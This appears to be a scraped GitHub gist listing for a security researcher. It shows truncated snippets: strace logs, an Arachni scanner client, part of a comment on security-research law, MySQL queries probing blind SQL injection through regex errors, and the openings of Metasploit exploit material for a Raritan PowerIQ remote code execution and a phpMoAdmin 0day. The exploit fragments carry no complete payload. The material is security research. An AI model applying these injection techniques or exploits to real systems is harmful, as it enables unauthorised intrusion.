Brandon Perry brandonprry
☠️ thought bleeding
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Architecture Description
+++-==============================-===========================-============-===============================================================================
ii acl 2.2.52-2 amd64 Access control list utilities
ii acpi 1.7-1 amd64 displays information on ACPI devices
ii acpi-support-base 0.142-6 all scripts for handling base ACPI events such as the power button
ii acpid 1:2.0.23-2 amd64 Advanced Configuration and Power Interface event daemon
ii adduser 3.113+nmu3 all add and remove users and groups
@brandonprry
brandonprry / gist:4525ded8fca350e98d46
Created September 11, 2015 01:22
Uninstrumented strace
# LD_PRELOAD=preeny/x86_64-linux-gnu/desock.so strace ./main < get
execve("./main", ["./main"], [/* 23 vars */]) = 0
brk(0) = 0x801000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd14ca18000
open("preeny/x86_64-linux-gnu/desock.so", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\24\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=18659, ...}) = 0
getcwd("/root", 128) = 6
mmap(NULL, 2240912, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fd14c5d0000
@brandonprry
brandonprry / gist:ef1f5ecf7f7d0cc8da03
Last active September 11, 2015 01:33
Instrumented strace
# LD_PRELOAD=preeny/x86_64-linux-gnu/desock.so strace ./main < get
execve("./main", ["./main"], [/* 23 vars */]) = 0
brk(0) = 0x1ce9000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f75d449e000
open("preeny/x86_64-linux-gnu/desock.so", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\24\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=18659, ...}) = 0
getcwd("/root", 128) = 6
mmap(NULL, 2240912, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f75d4050000
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <microhttpd.h>
#define PORT 8081
int done = 0;
public static void Main (string[] args)
{
using (ArachniSession session = new ArachniSession ("192.168.2.207", 4567, true)) {
using (ArachniManager manager = new ArachniManager (session)) {
var resp = manager.StartScan ("http://192.168.2.87/?searchquery=fdsa&action=search&x=11&y=15");
while (manager.IsBusy ()) {
Thread.Sleep (10000);
Console.Write (".");
}

Comment regarding Class-25: Software – security research

Brandon Perry, VolatileMinds

Legislation concerning lawful security research requires consideration not only of the current state of software security, but also of the future of how we as Americans will consume and create software. Increasingly, software drives basic functions within each and every American’s daily life. Legislators and members of the security community have an excellent opportunity to create a framework that allows research by those with the capabilities and know-how to bolster the security of our homes, our businesses, and our infrastructure.

We live in a digital world now. Thirty years ago, when computer software was only beginning to be accepted by the mainstream public, legislators passed the Computer Fraud and Abuse Act. This was before the Internet of Everything was a gleam in anyone’s eye, and the notion of us running out of IP addresses was laughable. Now, we have critical infrastructure, smart home appliances, and even vehicle

mysql> select 1 from users where 'fdsa' rlike (select (case when (19>20) then 'a' else '|' end));
ERROR 1139 (42000): Got error 'empty (sub)expression' from regexp
mysql> select length((select name from users limit 0,1));
+--------------------------------------------+
| length((select name from users limit 0,1)) |
+--------------------------------------------+
| 5 |
+--------------------------------------------+
1 row in set (0.00 sec)
@brandonprry
brandonprry / gist:f83917e0fcc3bf3ccd6b
Last active August 29, 2015 14:16
Raritan PowerIQ 4.1/4.2/4.3 known session secret unauthenticated RCE
msf exploit(rails_secret_deserialization) > show options
Module options (exploit/multi/http/rails_secret_deserialization):
Name Current Setting Required Description
---- --------------- -------- -----------
COOKIE_NAME no The name of the session cookie
DIGEST_NAME SHA1 yes The digest t
@brandonprry
brandonprry / phpmoadmin_rce.rb
Last active August 29, 2015 14:16
Quick metasploit module for possible phpMoAdmin 0day
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'rexml/document'
class Metasploit4 < Msf::Exploit::Remote